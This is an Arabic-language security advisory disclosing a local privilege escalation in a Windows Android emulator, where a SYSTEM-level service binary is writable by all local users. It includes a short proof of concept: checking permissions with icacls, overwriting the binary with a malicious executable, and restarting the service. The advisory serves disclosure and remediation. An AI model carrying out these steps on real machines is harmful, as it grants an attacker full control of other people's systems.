
CVE-2026-36213 | تصعيد امتيازات محلي في محاكي أندرويد MEmu 9.2.7.0 عبر صلاحيات غير آمنة للملف الثنائي للخدمة | تم إصلاحه في 9.3.2
CVE-2026-36213 | تصعيد محلي للامتيازات في MEmu Android Emulator 9.2.7.0 عبر صلاحيات غير آمنة لملف الخدمة التنفيذي | تم إصلاحه في 9.3.2
ثغرة تصعيد محلي للامتيازات (LPE) في MEmu Android Emulator 9.2.7.0.
تعمل الخدمة MEmuSVC بصلاحيات NT AUTHORITY\SYSTEM بينما يمكن لأي مستخدم محلي الكتابة على ملفها التنفيذي، مما يسمح بالسيطرة الكاملة على النظام.
| الحقل | التفاصيل |
|---|---|
| CVE | CVE-2026-36213 |
| المنتج | MEmu Android Emulator (MicroVirt) |
| الإصدار المتأثر | 9.2.7.0 والإصدارات الأقدم |
| الإصدار المُصلَح | 9.3.2 |
| CWE | CWE-732 / CWE-269 |
| CVSS v3.1 | 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK | T1574.010 |
MEmuService.exe مثبّتة كخدمة Windows بمستوى SYSTEM مع صلاحيات NTFS غير آمنة:
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) ← Any local user has Full Control
Everyone:(F) ← World-writable binar
:: الخطوة 1 - التحقق من الصلاحيات المعرضة للخطر
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
:: الخطوة 2 - استبدال الملف التنفيذي (كمستخدم محدود الصلاحيات)
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
:: الخطوة 3 - إعادة تشغيل الخدمة
sc stop MEmuSVC && sc start MEmuSVC
:: النتيجة: يعمل malicious.exe بصلاحيات NT AUTHORITY\SYSTEM
متاح على: https://github.com/sec-zone/Hijack-service-binaries
تم إجراء هذا البحث لأغراض تعليمية وفق سياسة الإفصاح المسؤول.
المؤلف غير مسؤول عن أي إساءة استخدام لهذه المعلومات.
الاسم: Mohammad Hossein Ashofte Yazdi
لينكد إن: https://www.linkedin.com/in/seczone64
تويتر: @sec_zone64
البريد الإلكتروني: [email protected]